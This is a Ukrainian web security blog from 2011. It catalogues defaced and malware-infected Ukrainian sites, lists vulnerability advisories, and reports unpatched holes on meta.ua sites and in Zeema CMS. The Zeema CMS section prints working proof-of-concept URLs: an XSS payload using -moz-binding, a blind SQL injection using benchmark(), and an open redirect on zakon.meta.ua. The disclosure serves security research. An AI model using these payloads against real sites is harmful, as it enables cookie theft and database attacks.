Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://rada-bershad.gov.ua (хакером ho1onk) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://koreiz-ps.gov.ua (хакером Wizardz) - 26.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://webkolo.org.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
• http://webkolo.com.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
• http://azovdvorik.com (хакером iskorpitx) - 10.08.2011, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay (деталі)
• Cross-Site Scripting vulnerability in Icinga (деталі)
• SAP NetWeaver JavaMailExamples - XSS (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• Multiple SQL Injections in A Really Simple Chat (ARSC) (деталі)
• SAP NetWeaver ipcpricing - information disclose (деталі)
• XSS in A Really Simple Chat (ARSC) (деталі)
• Apache Archiva Multiple CSRF vulnerability (деталі)
• Apache Archiva Multiple XSS vulnerability (деталі)
• WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability (деталі)

Ще влітку 2007 року, 07.06.2007 та 08.07.2007, я знайшов Cross-Site Scripting уразливості на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на zakon.meta.ua.

XSS:

• alert(document.cookie) (для IE, а з використанням MouseOverJacking можна зробити версію для всіх браузерів)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у 2007 році (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

В серпні відбувся новий масовий взлом сайтів на сервері Besthosting. Він тривав на протязі 2010 - 2011 років: 14.12.2010, 27.12.2010, 22.01.2011, 04.02.2011-22.02.2011, 11.03.2011, 20.04.2011, 02.05.2011, 11.07.2011, 10.08.2011 та 11.09.2011-14.09.2011. Другий масовий взлом сайтів на сервері Besthosting відбувся раніше.

Був взломаний сервер української компанії Besthosting. Взлом, що складався з декількох масових дефейсів та багатьох окремих дефейсів по одному або декількох сайтах, відбувся в той же період, що і згаданий масовий взлом сайтів на сервері HostPro.

Всього було взломано 55 сайтів на сервері хостера Besthosting (IP 195.248.234.41). Це наступні сайти: www.dvs-vinnitsa.gov.ua, artbagets.com, ubozcn.gov.ua, picks.com.ua, rock.vn.ua, sharkdesign.com.ua, fest.od.ua, bastion.vn.ua, artstuff-pro.com.ua, wn4wz.org.ua, reactorband.com, startup-music.com, terroraiser.com, stalwart.ru, multimarket.in.ua, advokat-chernigov.com.ua, advokat-ismailov.com, www.derevodekor.ru, domikvkaluge.ru, saunapodkluch.com, www.megamart.dp.ua, sng-technologies.com, www.mediapositiv.com, andriyushenko.com, aspua.com, exybible.ru, web.cn.ua, viglstudio.com.ua, optdekor.com, olkaragro.com.ua, harakterstvo.in.ua, impreza.biz.ua, ithelper.com.ua, itmasters.kiev.ua, vipmaster.dn.ua, slepki.com.ua, sde.in.ua, shoptrenager.com.ua, studio-disco.com, bizgarant.com, katalogi.in.ua, kbr.in.ua, carbon.lg.ua, budservice.vn.ua, diana-secret.com, www.icees.ru, www.admin.vn.ua, www.zhu4ok.com, www.mir-ok.in.ua, www.momibosse.com.ua, 2g-studio.net, edemnaotdyh.com, lyubavushka.com, umishki.com.ua, nocturnus.com.ua. Серед них українські державні сайти ubozcn.gov.ua та www.dvs-vinnitsa.gov.ua.

З зазначених 55 сайтів 1 сайт був взломаний хакерами з S3cur1ty-T3r0r-Cr3w, 14 сайтів хакером Besiktas Carsi Grubu, 2 сайти хакером iskorpitx, 2 сайти хакерами з RKH, 2 сайти хакерами з KSG-CREW, 2 сайти хакером biangrusuh, 7 сайтів хакером Mr AnEnO, 21 сайт хакером Matrex, 3 сайти хакерами з ahs-hackerz та 1 сайт хакером kaMtiEz.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу невиликої групи сайтів та багатьох взломів маленьких груп сайтів на протязі двох років, маловірогідно, що вони були взломані через взлом серверу хостінг провайдера (коли через взлом одного сайта, був отриманий root доступ до сервера). Але атаку на інші сайти на даному сервері через взлом одного сайту не можна виключати (бо до деяких з цих сайтів могли дістатися і без root доступа).

Окрім сервісів для роботи з DNS серверами та сканування портів, про які я писав раніше, viewdns.info пропонує інші сервіси. Зокрема це Reverse IP Lookup - сервіс для зворотнього пошуку IP.

За допомогою онлайнового сервіса Reverse IP Lookup можна по доменному імені або по IP визначити які ще домени (сайти) розміщені на даному хості. Що може бути дуже корисно в деяких випадках (зокрема при аудиті чи пентесті).

Так само як і раніше згадані сервіси, даний онлайн інструмент від viewdns.info є безкоштовним.

В Інтернеті є чимало сайтів, що надають подібний сервіс. Але цей сервіс, як й інші, що мені траплялися, працює недостатньо ефективно і знаходить мало сайтів на хостах, зокрема на Shared Hosting серверах, на яких розміщено багато сайтів. Я сам вже багато років планую зробити власний сервіс для визначення всіх сайтів на хості (при цьому я планую зробити власний онлайн сервіс більш ефективним ніж аналогічні існуючі сервіси).

27.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Cross-Site Scripting, SQL Injection та Information Leakage уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це друга частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

07.12.2011

Cross-Site Scripting:

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака спрацює в браузерах Mozilla і Firefox.

SQL Injection:

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Це blind SQL Injection.

Information Leakage:

Статистика сайта http://site/counter/ знаходиться в публічному доступі (і шлях до неї легко дізнатися).

Уразливі всі версії Zeema CMS.

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки. Цього разу нова добірка статтей про безпеку онлайнових електронних транзакцій та використання платіжних карт в Інтернеті (на початку року я вже піднімав дану тему).

Добірка цікавого чтива на тему безпеки платіжних карт (статті з Вікіпедії):

• Payment Card Industry Data Security Standard (PCI DSS)
• Payment Application Data Security Standard (PA-DSS)
• Qualified Security Assessor (QSA)
• Payment system
• E-commerce payment system

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://archive.org.ua - інфекція була виявлена 27.11.2011. Зараз сайт не входить до переліку підозрілих.
• http://orienteering.dp.ua - інфекція була виявлена 06.12.2011. Зараз сайт не входить до переліку підозрілих.
• http://krizis2009.org.ua - інфекція була виявлена 22.11.2011. Зараз сайт входить до переліку підозрілих.
• http://drummer.in.ua - інфекція була виявлена 20.11.2011. Зараз сайт не входить до переліку підозрілих.
• http://medinstitut.kiev.ua - інфекція була виявлена 06.12.2011. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability (деталі)
• XSS in Ajax Chat (деталі)
• Eucalyptus vulnerability (деталі)
• SAP RSTXSCRP report - smb relay vulnerability (деталі)
• Plone XSS and permission errors (деталі)
• Apache Archiva Multiple XSS vulnerabilities (деталі)
• Apache Archiva Multiple CSRF vulnerabilities (деталі)
• mahara security update (деталі)
• SAP BW Doc - Multiple XSS (деталі)
• Post Revolution 0.8.0c Multiple Remote Vulnerabilities (деталі)

У січні, 26.01.2008, я знайшов Cross-Site Scripting та Redirector уразливості на сайті http://zakon.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливість на passport.meta.ua.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

XSS (Strictly social XSS):

• alert(document.cookie)

Redirector (URL Redirector Abuse):

http://zakon.meta.ua/law.asp?url=http://websecurity.com.ua

Про цей редиректор я вже писав в 2008 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у січні 2008 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.